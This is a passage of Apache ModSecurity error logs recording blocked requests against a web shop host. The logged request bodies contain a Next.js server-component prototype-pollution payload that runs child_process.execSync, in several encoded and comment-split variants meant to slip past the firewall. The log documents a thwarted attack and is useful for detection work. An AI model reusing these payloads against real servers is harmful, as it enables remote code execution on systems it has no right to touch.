"cms.dev-unit.com"] [uri "/products"] [unique_id "adJmzUI7AjfUQYCN-J7DqwAAANc"] [Sun Apr 05 15:42:37.438829 2026] [:error] [pid 13019:tid 13253] [client 172.94.9.253:44028] [client 172.94.9.253] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22then\\x22:\\x22$1:__proto__:then\\x22,\\x22status\\x22:\\x22resolved_model\\x22,\\x22reason\\x22:-1,\\x22value\\x22:\\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22,\\x22_response\\x22:{\\x22_prefix\\x22:\\x22var res=process.mainModule.require('chi' 'ld_' 'pro' 'cess').execSync('echo $((41*271))').toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'),{digest: `NEXT_REDIRECT;push;/login?a=${res};307;`});\\x22,\\x22_chunks\\x22:\\x22$Q2\\x22,\\x22_formData\\x22:{\\x22..."] [sever [hostname "cms.dev-unit.com"] [uri "/products"] [unique_id "adJmzbxQSOrq_iRTM7dp5gAAAQ0"] [Sun Apr 05 15:42:37.507541 2026] [:error] [pid 1503:tid 1522] [client 172.94.9.253:44164] [client 172.94.9.253] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22then\\x22:\\x22$1:__proto__:then\\x22,\\x22status\\x22:\\x22resolved_model\\x22,\\x22reason\\x22:-1,\\x22value\\x22:\\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22,\\x22_response\\x22:{\\x22_prefix\\x22:\\x22var res=process.mainModule.require('child_process').execSync('echo $((41*271))').toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'),{digest: `NEXT_REDIRECT;push;/login?a=${res};307;`});\\x22,\\x22_chunks\\x22:\\x22$Q2\\x22,\\x22_formData\\x22:{\\x22get\\x22:\\..."] [sever [hostname "cms.dev-unit.com"] [uri "/checkout"] [unique_id "adJmzUI7AjfUQYCN-J7DrAAAAM0"] [Sun Apr 05 15:42:37.517045 2026] [:error] [pid 13019:tid 13251] [client 172.94.9.253:44174] [client 172.94.9.253] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22then\\x22:\\x22$1:__proto__:then\\x22,\\x22status\\x22:\\x22resolved_model\\x22,\\x22reason\\x22:-1,\\x22value\\x22:\\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22,\\x22_response\\x22:{\\x22_prefix\\x22:\\x22var res=process.mainModule.require('child_process').execSync('echo $((41*271))').toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'),{digest: `NEXT_REDIRECT;push;/login?a=${res};307;`});\\x22,\\x22_chunks\\x22:\\x22$Q2\\x22,\\x22_formData\\x22:{\\x22get\\x22:\\..."] [sever [hostname "cms.dev-unit.com"] [uri "/checkout"] [unique_id "adJmzbxQSOrq_iRTM7dp6AAAAQs"] [Sun Apr 05 15:42:37.517166 2026] [:error] [pid 23077:tid 23106] [client 172.94.9.253:44118] [client 172.94.9.253] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22then\\x22:\\x22$1:__proto__:then\\x22,\\x22status\\x22:\\x22resolved_model\\x22,\\x22reason\\x22:-1,\\x22value\\x22:\\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22,\\x22_response\\x22:{\\x22_prefix\\x22:\\x22var res=process.mainModule.require('child_process').execSync(Buffer.from('6563686f2024282834312a3237312929','hex').toString()).toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'),{digest: `NEXT_REDIRECT;push;/login?a=${res};307;`});\\x22,\\x22_chunks\\x2..."] [sever [hostname "cms.dev-unit.com"] [uri "/checkout"] [unique_id "adJmzZc83uMXRUE9zvQTCQAAAdc"] [Sun Apr 05 15:42:37.517565 2026] [:error] [pid 1503:tid 1520] [client 172.94.9.253:44186] [client 172.94.9.253] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22then\\x22:\\x22$1:__proto__:then\\x22,\\x22status\\x22:\\x22resolved_model\\x22,\\x22reason\\x22:-1,\\x22value\\x22:\\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22,\\x22_response\\x22:{\\x22_prefix\\x22:\\x22var res=process.mainModule.require(['child','_','process'].join('')).execSync('echo $((41*271))').toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'),{digest: `NEXT_REDIRECT;push;/login?a=${res};307;`});\\x22,\\x22_chunks\\x22:\\x22$Q2\\x22,\\x22_formData\\x..."] [sever [hostname "cms.dev-unit.com"] [uri "/products"] [unique_id "adJmzUI7AjfUQYCN-J7DrQAAAMs"] [Sun Apr 05 15:42:37.517853 2026] [:error] [pid 13019:tid 13256] [client 172.94.9.253:44148] [client 172.94.9.253] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22\\x5cu0074\\x5cu0068\\x5cu0065\\x5cu006e\\x22:\\x22$1:\\x5cu005f\\x5cu005f\\x5cu0070\\x5cu0072\\x5cu006f\\x5cu0074\\x5cu006f\\x5cu005f\\x5cu005f:\\x5cu0074\\x5cu0068\\x5cu0065\\x5cu006e\\x22,\\x22\\x5cu0073\\x5cu0074\\x5cu0061\\x5cu0074\\x5cu0075\\x5cu0073\\x22:\\x22\\x5cu0072\\x5cu0065\\x5cu0073\\x5cu006f\\x5cu006c\\x5cu0076\\x5cu0065\\x5cu0064\\x5cu005f\\x5cu006d\\x5cu006f\\x5cu0064\\x5cu0065\\x5cu006c\\x22,\\x22\\x5cu0072\\x5cu0065\\x5cu0061\\x5cu0073\\x5cu006f\\x5cu006e\\x22:-1,\\x22\\x5cu0076\\x5cu0061\\x5cu0..."] [sever [hostname "cms.dev-unit.com"] [uri "/products"] [unique_id "adJmzbxQSOrq_iRTM7dp6gAAARA"] [Sun Apr 05 15:42:37.518302 2026] [:error] [pid 13019:tid 13264] [client 172.94.9.253:44214] [client 172.94.9.253] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22then\\x22:\\x22$1:__proto__:then\\x22,\\x22status\\x22:\\x22resolved_model\\x22,\\x22reason\\x22:-1,\\x22value\\x22:\\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22,\\x22_response\\x22:{\\x22_prefix\\x22:\\x22var res=process.mainModule.require('child_process').execSync('echo $((41*271))').toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'),{digest: `NEXT_REDIRECT;push;/login?a=${res};307;`});\\x22,\\x22_chunks\\x22:\\x22$Q2\\x22,\\x22_formData\\x22:{\\x22get\\x22:\\..."] [sever [hostname "cms.dev-unit.com"] [uri "/shop"] [unique_id "adJmzbxQSOrq_iRTM7dp5wAAARg"] [Sun Apr 05 15:42:37.533958 2026] [:error] [pid 23077:tid 23105] [client 172.94.9.253:44208] [client 172.94.9.253] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22then\\x22:\\x22$1:__proto__:then\\x22,\\x22status\\x22:\\x22resolved_model\\x22,\\x22reason\\x22:-1,\\x22value\\x22:\\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22,\\x22_response\\x22:{\\x22_prefix\\x22:\\x22var\\x5ctres=process.mainModule.require('child_process').execSync('echo $((41*271))').toString().trim();;throw\\x5ctObject.assign(new\\x5ctError('NEXT_REDIRECT'),{digest:\\x5ct`NEXT_REDIRECT;push;/login?a=${res};307;`});\\x22,\\x22_chunks\\x22:\\x22$Q2\\x22,\\x22_formData\\x2..."] [sever [hostname "cms.dev-unit.com"] [uri "/products"] [unique_id "adJmzZc83uMXRUE9zvQTCgAAAdY"] [Sun Apr 05 15:42:37.533991 2026] [:error] [pid 1503:tid 1533] [client 172.94.9.253:44132] [client 172.94.9.253] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22then\\x22:\\x22$1:__proto__:then\\x22,\\x22status\\x22:\\x22resolved_model\\x22,\\x22reason\\x22:-1,\\x22value\\x22:\\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22,\\x22_response\\x22:{\\x22_prefix\\x22:\\x22var/*bypass*/res=process.mainModule.require(/*waf*/'child_process'/*bypass*/).execSync('echo $((41*271))').toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'),{digest: `NEXT_REDIRECT;push;/login?a=${res};307;`});\\x22,\\x22_chunks\\x22:\\x22$Q2\\x22,\\x22_f..."] [sever [hostname "cms.dev-unit.com"] [uri "/products"] [unique_id "adJmzUI7AjfUQYCN-J7DrgAAANU"] [Sun Apr 05 15:42:37.534180 2026] [:error] [pid 13019:tid 13250] [client 172.94.9.253:44230] [client 172.94.9.253] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22then\\x22:\\x22$1:__proto__:then\\x22,\\x22status\\x22:\\x22resolved_model\\x22,\\x22reason\\x22:-1,\\x22value\\x22:\\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22,\\x22_response\\x22:{\\x22_prefix\\x22:\\x22var res=process.mainModule.require('child_process').execSync(Buffer.from('ZWNobyAkKCg0MSoyNzEpKQ==','base64').toString()).toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'),{digest: `NEXT_REDIRECT;push;/login?a=${res};307;`});\\x22,\\x22_chunks\\x22:\\x2..."] [sever [hostname "cms.dev-unit.com"] [uri "/checkout"] [unique_id "adJmzbxQSOrq_iRTM7dp6wAAAQo"] [Sun Apr 05 15:42:37.596783 2026] [:error] [pid 13019:tid 13253] [client 172.94.9.253:44296] [client 172.94.9.253] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22then\\x22:\\x22$1:__proto__:then\\x22,\\x22status\\x22:\\x22resolved_model\\x22,\\x22reason\\x22:-1,\\x22value\\x22:\\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22,\\x22_response\\x22:{\\x22_prefix\\x22:\\x22var\\x5ctres=process.mainModule.require('child_process').execSync('echo $((41*271))').toString().trim();;throw\\x5ctObject.assign(new\\x5ctError('NEXT_REDIRECT'),{digest:\\x5ct`NEXT_REDIRECT;push;/login?a=${res};307;`});\\x22,\\x22_chunks\\x22:\\x22$Q2\\x22,\\x22_formData\\x2..."] [sever [hostname "cms.dev-unit.com"] [uri "/checkout"] [unique_id "adJmzbxQSOrq_iRTM7dp7AAAAQ0"] [Sun Apr 05 15:42:37.597227 2026] [:error] [pid 23077:tid 23107] [client 172.94.9.253:44270] [client 172.94.9.253] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22then\\x22:\\x22$1:__proto__:then\\x22,\\x22status\\x22:\\x22resolved_model\\x22,\\x22reason\\x22:-1,\\x22value\\x22:\\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22,\\x22_response\\x22:{\\x22_prefix\\x22:\\x22var res=process.mainModule.require(['child','_','process'].join('')).execSync('echo $((41*271))').toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'),{digest: `NEXT_REDIRECT;push;/login?a=${res};307;`});\\x22,\\x22_chunks\\x22:\\x22$Q2\\x22,\\x22_formData\\x..."] [sever [hostname "cms.dev-unit.com"] [uri "/checkout"] [unique_id "adJmzZc83uMXRUE9zvQTCwAAAdg"] [Sun Apr 05 15:42:37.597567 2026] [:error] [pid 23077:tid 23096] [client 172.94.9.253:44240] [client 172.94.9.253] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22then\\x22:\\x22$1:__proto__:then\\x22,\\x22status\\x22:\\x22resolved_model\\x22,\\x22reason\\x22:-1,\\x22value\\x22:\\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22,\\x22_response\\x22:{\\x22_prefix\\x22:\\x22var res=process.mainModule.require('chi' 'ld_' 'pro' 'cess').execSync('echo $((41*271))').toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'),{digest: `NEXT_REDIRECT;push;/login?a=${res};307;`});\\x22,\\x22_chunks\\x22:\\x22$Q2\\x22,\\x22_formData\\x22:{\\x22..."] [sever [hostname "cms.dev-unit.com"] [uri "/checkout"] [unique_id "adJmzZc83uMXRUE9zvQTDAAAAc0"] [Sun Apr 05 15:42:37.598374 2026] [:error] [pid 1503:tid 1515] [client 172.94.9.253:44238] [client 172.94.9.253] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22then\\x22:\\x22$1:__proto__:then\\x22,\\x22status\\x22:\\x22resolved_model\\x22,\\x22reason\\x22:-1,\\x22value\\x22:\\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22,\\x22_response\\x22:{\\x22_prefix\\x22:\\x22var/*bypass*/res=process.mainModule.require(/*waf*/'child_process'/*bypass*/).execSync('echo $((41*271))').toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'),{digest: `NEXT_REDIRECT;push;/login?a=${res};307;`});\\x22,\\x22_chunks\\x22:\\x22$Q2\\x22,\\x22_f..."] [sever [hostname "cms.dev-unit.com"] [uri "/checkout"] [unique_id "adJmzUI7AjfUQYCN-J7DrwAAAMY"] [Sun Apr 05 15:42:37.602352 2026] [:error] [pid 13019:tid 13245] [client 172.94.9.253:44198] [client 172.94.9.253] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22then\\x22:\\x22$1:__proto__:then\\x22,\\x22status\\x22:\\x22resolved_model\\x22,\\x22reason\\x22:-1,\\x22value\\x22:\\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22,\\x22_response\\x22:{\\x22_prefix\\x22:\\x22var res=process.mainModule.require('child_process').execSync('echo $((41*271))').toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'),{digest: `NEXT_REDIRECT;push;/login?a=${res};307;`});\\x22,\\x22_chunks\\x22:\\x22$Q2\\x22,\\x22_formData\\x22:{\\x22get\\x22:\\..."] [sever [hostname "cms.dev-unit.com"] [uri "/"] [unique_id "adJmzbxQSOrq_iRTM7dp6QAAAQU"] [Sun Apr 05 15:42:37.603958 2026] [:error] [pid 1309:tid 1390] [client 172.94.9.253:44290] [client 172.94.9.253] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22then\\x22:\\x22$1:__proto__:then\\x22,\\x22status\\x22:\\x22resolved_model\\x22,\\x22reason\\x22:-1,\\x22value\\x22:\\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22,\\x22_response\\x22:{\\x22_prefix\\x22:\\x22var res=process.mainModule.require('child_process').execSync(decodeURIComponent(decodeURIComponent('echo%20%24%28%2841%2A271%29%29'))).toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'),{digest: `NEXT_REDIRECT;push;/login?a=${res};307;`});\\x22,\\x22_c..."] [sever [hostname "cms.dev-unit.com"] [uri "/checkout"] [unique_id "adJmzT-XKUNJEHmNu6G7vwAAAJM"] [Sun Apr 05 15:42:37.604104 2026] [:error] [pid 1503:tid 1510] [client 172.94.9.253:44254] [client 172.94.9.253] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22\\x5cu0074\\x5cu0068\\x5cu0065\\x5cu006e\\x22:\\x22$1:__proto__:then\\x22,\\x22\\x5cu0073\\x5cu0074\\x5cu0061\\x5cu0074\\x5cu0075\\x5cu0073\\x22:\\x22resolved_model\\x22,\\x22\\x5cu0072\\x5cu0065\\x5cu0061\\x5cu0073\\x5cu006f\\x5cu006e\\x22:-1,\\x22\\x5cu0076\\x5cu0061\\x5cu006c\\x5cu0075\\x5cu0065\\x22:\\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22,\\x22_response\\x22:{\\x22_prefix\\x22:\\x22var res=process.mainModule.require('child_process').execSync('echo $((41*271))').toString().trim(..."] [sever [hostname "cms.dev-unit.com"] [uri "/checkout"] [unique_id "adJmzUI7AjfUQYCN-J7DsAAAAME"] [Sun Apr 05 15:42:37.604577 2026] [:error] [pid 23077:tid 23091] [client 172.94.9.253:44280] [client 172.94.9.253] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22then\\x22:\\x22$1:__proto__:then\\x22,\\x22status\\x22:\\x22resolved_model\\x22,\\x22reason\\x22:-1,\\x22value\\x22:\\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22,\\x22_response\\x22:{\\x22_prefix\\x22:\\x22var res=process.mainModule.require('child_process').execSync('echo $((41*271))').toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'),{digest: `NEXT_REDIRECT;push;/login?a=${res};307;`});\\x22,\\x22_chunks\\x22:\\x22$Q2\\x22,\\x22_formData\\x22:{\\x22get\\x22:\\..."] [sever [hostname "cms.dev-unit.com"] [uri "/checkout"] [unique_id "adJmzZc83uMXRUE9zvQTDQAAAcg"] [Sun Apr 05 15:42:37.610047 2026] [:error] [pid 23077:tid 23086] [client 172.94.9.253:44256] [client 172.94.9.253] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: 